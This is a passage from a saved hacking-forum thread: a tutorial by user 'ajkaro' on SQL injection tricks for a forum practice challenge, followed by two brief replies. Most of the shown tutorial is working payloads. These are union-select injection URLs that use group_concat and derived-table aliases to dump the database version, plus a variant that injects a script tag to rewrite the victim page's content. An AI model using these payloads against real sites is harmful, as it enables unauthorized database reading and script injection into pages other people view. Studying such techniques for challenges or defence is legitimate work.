#FFD700;">version</span> followed by our separator <span style="font-weight: bold;"><span style="color: #FF0000;">:: ajkaro</span></span> (nick name in red color). As there is only one argument in group_concat (<span style="color: #FFD700;">version()</span>) nothing will be concatenated after our separator). Challenge solved <img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"><br><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/04cb5d58ccd6d0531b0b2fc533e82a90.jpg" alt="[Image: 04cb5d58ccd6d0531b0b2fc533e82a90.jpg]" border="0"><br><br><br><span style="color: #FFA500;"><span style="font-size: xx-large;"><span style="font-weight: bold;">Trick #2</span></span></span><br>We already know we can use union command in our injections. <span style="color: #FFD700;">UNION</span> is used to combine the result from multiple SELECT statements into a single result set.<br><br>Let's compose such combination of multiple <span style="color: #FFD700;">select</span> statements unioned with <span style="color: #FFD700;">union</span>s:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;group_concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">vvv&nbsp;separator&nbsp;</span><span style="color: #FF99FF">''</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;version</span><span style="color: #7AC07C">()&nbsp;as&nbsp;</span><span style="color: #66CCFF">vvv&nbsp;union&nbsp;select&nbsp;</span><span style="color: #FF99FF">'&lt;font&nbsp;color=red&gt;'&nbsp;</span><span style="color: #66CCFF">union&nbsp;select&nbsp;</span><span style="color: #FF99FF">'&nbsp;::&nbsp;ajkaro'</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>First we defined group_concat with separator '' (nothing). For group_concat we must define table name like:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">group_concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">some_column</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;some_table&nbsp;<br></span></code></div></div></div><br>Here we will cheat. Instead <span style="color: #FFD700;">from some_table</span> we will use:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;version</span><span style="color: #7AC07C">()&nbsp;as&nbsp;</span><span style="color: #66CCFF">vvv&nbsp;union&nbsp;select&nbsp;</span><span style="color: #FF99FF">'&lt;font&nbsp;color=red&gt;'&nbsp;</span><span style="color: #66CCFF">union&nbsp;select&nbsp;</span><span style="color: #FF99FF">'&nbsp;::&nbsp;ajkaro'</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>We used <span style="color: #32CD32;">vvv</span> as <span style="color: #FFD700;">column alias</span> as we must define column name used in group_concat. As alias we can use character or any string.<br><br>That part is <span style="color: #32CD32;">union</span>ed with next <span style="color: #32CD32;">select</span> statement where we <span style="color: #32CD32;">select</span>ed '&lt;font color=red&gt;', followed by the third <span style="color: #32CD32;">select</span> statement where we <span style="color: #32CD32;">select</span>ed nick name 'ajkaro'.<br><br>So we have 3 <span style="color: #32CD32;">select</span> statements <span style="color: #32CD32;">union</span>ed with two <span style="color: #32CD32;">union</span> parts.<br><br>After complete statement:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;group_concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">vvv&nbsp;separator&nbsp;</span><span style="color: #FF99FF">''</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;version</span><span style="color: #7AC07C">()&nbsp;as&nbsp;</span><span style="color: #66CCFF">vvv&nbsp;union&nbsp;select&nbsp;</span><span style="color: #FF99FF">'&lt;font&nbsp;color=red&gt;'&nbsp;</span><span style="color: #66CCFF">union&nbsp;select&nbsp;</span><span style="color: #FF99FF">'&nbsp;::&nbsp;ajkaro'</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>we must put alias of this derived table (although it isn't a real table). Just put some character or some string (I used alias <span style="color: #FFD700;">fake_table</span>) after last <span style="color: #FFD700;"><span style="font-weight: bold;">)</span></span> like:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;group_concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">vvv&nbsp;separator&nbsp;</span><span style="color: #FF99FF">''</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;version</span><span style="color: #7AC07C">()&nbsp;as&nbsp;</span><span style="color: #66CCFF">vvv&nbsp;union&nbsp;select&nbsp;</span><span style="color: #FF99FF">'&lt;font&nbsp;color=red&gt;'&nbsp;</span><span style="color: #66CCFF">union&nbsp;select&nbsp;</span><span style="color: #FF99FF">'&nbsp;::&nbsp;ajkaro'</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">fake_table&nbsp;<br></span></code></div></div></div><br>If we don't do that we get an error: <span style="color: #FF0000;">Every derived table must have its own alias</span><br><br>So our complete command will be:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">http</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//LinkFromTheChallenge/index.php?filename=one_lecturer.php&amp;id=-2'&nbsp;union&nbsp;select&nbsp;*&nbsp;from&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;1</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">a&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;group_concat</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">vvv&nbsp;separator&nbsp;</span><span style="color: #FF99FF">''</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;version</span><span style="color: #7AC07C">()&nbsp;as&nbsp;</span><span style="color: #66CCFF">vvv&nbsp;union&nbsp;select&nbsp;</span><span style="color: #FF99FF">'&lt;font&nbsp;color=red&gt;'&nbsp;</span><span style="color: #66CCFF">union&nbsp;select&nbsp;</span><span style="color: #FF99FF">'&nbsp;::&nbsp;ajkaro'</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">fake_table</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">b&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;3</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">c&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;4</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">d&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;5</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">e&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;6</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">f<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;7</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">g<br></span><span style="color: #7AC07C">--&nbsp;-&nbsp;<br></span></code></div></div></div><br>And result will be same as picture above <img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"><br><br><br><span style="color: #FFA500;"><span style="font-size: xx-large;"><span style="font-weight: bold;">Trick #3</span></span></span><br>In that trick we won't use same column for injection point so it violate <a href="http://www.hackforums.net/showthread.php?tid=3719389" target="_blank"><span style="text-decoration: underline;">challenge #64</span></a> rules. <span style="color: #FFD700;">I am showing it only as a POC we can simulate concatenating of some string somewhere on injected web page using</span> <span style="color: #32CD32;">javascript</span>.<br><br>Let's display version on screen:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">http</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//LinkFromTheChallenge/index.php?filename=one_lecturer.php&amp;id=-2'&nbsp;union&nbsp;select&nbsp;*&nbsp;from&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;1</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">a&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;version</span><span style="color: #7AC07C">())</span><span style="color: #66CCFF">b&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;3</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">c&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;4</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">d&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;5</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">e&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;6</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">f<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;7</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">g<br></span><span style="color: #7AC07C">--&nbsp;-&nbsp;<br></span></code></div></div></div><br>Now we will open source of web page and study it. What is near output of injected version: <span style="font-weight: bold;"><span style="color: #FFD700;">5.5.35-cll </span></span>? There is div section with id=<span style="color: #32CD32;">content_col2</span>.<br><br>Let's use some javascript code to search that part with:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">document</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">getElementById</span><span style="color: #7AC07C">(</span><span style="color: #FF99FF">"content_col2"</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>and insert our nick name in red color in front of it like:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">document</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">getElementById</span><span style="color: #7AC07C">(</span><span style="color: #FF99FF">"content_col2"</span><span style="color: #7AC07C">).</span><span style="color: #66CCFF">innerHTML</span><span style="color: #7AC07C">=</span><span style="color: #FF99FF">"&lt;font&nbsp;color=red&gt;&nbsp;ajkaro"&nbsp;</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">2b&nbsp;document</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">getElementById</span><span style="color: #7AC07C">(</span><span style="color: #FF99FF">"content_col2"</span><span style="color: #7AC07C">).</span><span style="color: #66CCFF">innerHTML</span><span style="color: #7AC07C">;&nbsp;<br></span></code></div></div></div><br>We simply assigned a new value to that part, where new value is our nick name in red color <span style="font-weight: bold;"><span style="color: #00BFFF;">+</span></span> old content of that div section (before our change). We used <span style="font-weight: bold;"><span style="color: #00BFFF;">%2b</span></span> (<span style="font-weight: bold;"><span style="color: #00BFFF;">+</span></span> in hex value).<br><br>Final solution will be:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">http</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//LinkFromTheChallenge/index.php?filename=one_lecturer.php&amp;id=-2'&nbsp;union&nbsp;select&nbsp;*&nbsp;from&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;1</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">a&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;version</span><span style="color: #7AC07C">())</span><span style="color: #66CCFF">b&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;3</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">c&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;4</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">d&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;select&nbsp;</span><span style="color: #FF99FF">'&lt;script&nbsp;type="text/javascript"&gt;document.getElementById("content_col2").innerHTML="&lt;font&nbsp;color=red&gt;&nbsp;ajkaro"&nbsp;%2b&nbsp;<br>document.getElementById("content_col2").innerHTML;&lt;/script&gt;'</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">e&nbsp;<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;6</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">f<br>&nbsp;join&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select&nbsp;7</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">g<br></span><span style="color: #7AC07C">--&nbsp;-&nbsp;<br></span></code></div></div></div><br>And result will be:<br><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/1fd9242c367ff176c1493c38081bce25.jpg" alt="[Image: 1fd9242c367ff176c1493c38081bce25.jpg]" border="0"><br><br>As you can see there are different solutions we can use...<br><br>Thanks for reading <img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_38367378"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4063916&amp;replyto=38367378" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid38377027" id="pid38377027"></a><table class="tborder" style="margin-top: 5px; " id="post_38377027" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">Today, 05:13 PM <span id="edited_by_38377027"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4063916&amp;pid=38377027#pid38377027">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/0fa0f9ce54eb150d907f3e0e35a039cf.png" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><span class="group2">hackforumspang</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Sardaukar<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 57<br>Posts: 1,806<br>Joined: Apr 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1241186"><strong class="reputation_positive">116</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38377027">Brilliant tutorial, friend. What happens after 30 tutorials? then you won't make any more? or just a personal goal?<br><br>Anyways, HQ as always. Guess that's why you're the mentor of this section.<br>School these fools. <img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br>Drank some energy drink shit so I'm jittery as fuck.<br>Hard to focus lol. But very good read :D<br><br>Well done.<br>Would +1 if I could.</div><div class="post_meta" id="post_meta_38377027"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1241186" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4063916&amp;replyto=38377027" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid38377266" id="pid38377266"></a><table class="tborder" style="margin-top: 5px; " id="post_38377266" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">Today, 05:24 PM <span id="edited_by_38377266"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4063916&amp;pid=38377266#pid38377266">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 132<br>Posts: 2,142<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">193</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38377266"><blockquote><cite><span>(Today 05:13 PM)</span>hackforumspang Wrote: <a href="http://www.hackforums.net/showthread.php?pid=38377027#pid38377027" class="quick_jump">►</a></cite>Brilliant tutorial, friend. What happens after 30 tutorials? then you won't make any more?<br><br>...</blockquote><br>Yep, that is correct hackforumspang. I will make 100 SQLi challenges and 30 tutorials. I like round numbers <img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/biggrin.gif" style="vertical-align: middle;" alt="Biggrin" title="Biggrin" border="0"><br><br>Thanks for your feed back <img src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> And congrats for making few very good tutorials lately. I enjoyed reading them...</div><div class="post_meta" id="post_meta_38377266"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4063916&amp;replyto=38377266" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=4063916&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=4063916&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=4063916" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=4063916">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=4063916" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4063916&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-4063916.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BTutorial%5D%20SQLi%20-%20tricks%20with%20concatenating%20data%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->